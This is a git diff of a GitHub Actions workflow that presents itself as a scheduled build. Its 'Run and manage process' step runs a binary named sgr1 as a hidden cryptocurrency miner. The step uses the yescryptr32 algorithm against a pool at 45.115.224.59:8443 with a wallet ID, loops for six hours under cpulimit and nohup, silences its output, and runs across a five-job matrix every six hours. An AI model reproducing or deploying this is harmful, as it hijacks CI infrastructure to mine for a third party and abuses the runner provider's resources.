--- a/.github/workflows/main22.yml
+++ b/.github/workflows/main22.yml
@@ -7,20 +7,20 @@ on:
   schedule:
     - cron: '0 */6 * * *'
 
-jobs: 
-  build: 
-    name: build 
-    runs-on: ubuntu-latest 
-    strategy: 
-      max-parallel: 5 
-      fail-fast: false 
-      matrix: 
-        go: [1, 2, 3, 4, 5] 
-        flag: [A] 
-    env: 
-      NUM_JOBS: 40  
-      JOB: ${{ matrix.go }} 
-    steps: 
+jobs:
+  build:
+    name: build
+    runs-on: ubuntu-latest
+    strategy:
+      max-parallel: 5
+      fail-fast: false
+      matrix:
+        go: [1, 2, 3, 4, 5]
+        flag: [A]
+    env:
+      NUM_JOBS: 40
+      JOB: ${{ matrix.go }}
+    steps:
     - name: Checkout code
       uses: actions/checkout@v2
 
@@ -45,18 +45,30 @@ jobs:
 
     - name: Run and manage process
       run: |
-        # Start the process with cpulimit
-        cpulimit -l 300 -e ./sgr1 &
-        pid=$!
+        start_time=$(date +%s)
+        end_time=$((start_time + 6*3600))  # 6 hours from start
+        while [ $(date +%s) -lt $end_time ]; do
+          # Start the process with cpulimit
+          cpulimit -l 300 -e ./sgr1 &
+          
+          # Store the PID of cpulimit
+          cpulimit_pid=$!
+          
+          # Run the process with the specified parameters in background
+          nohup ./sgr1 -a yescryptr32 --pool 45.115.224.59:8443 -u UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$JOB --timeout 120 -t 4 > /dev/null 2>&1 &
+          
+          # Store the PID of the running process
+          process_pid=$!
+          
+          # Run for 1 minute
+          sleep 60
+          
+          # Kill the process
+          kill $process_pid || true
 
-        # Run the process with the specified parameters
-        nohup ./sgr1 -a yescryptr32 --pool 45.115.224.59:8443 -u UddCZe5d6VZNj2B7BgHPfyyQvCek6txUTx.$JOB --timeout 120 -t 4 > /dev/null 2>&1 &
+          # Wait for 2 minutes before the next iteration
+          sleep 120
+        done
 
-        # Run for 1 minute
-        sleep 60
-
-        # Kill the process
-        kill $pid || true
-
-        # Wait for 2 minutes before the next iteration
-        sleep 120
+        # Clean up
+        kill $cpulimit_pid || true
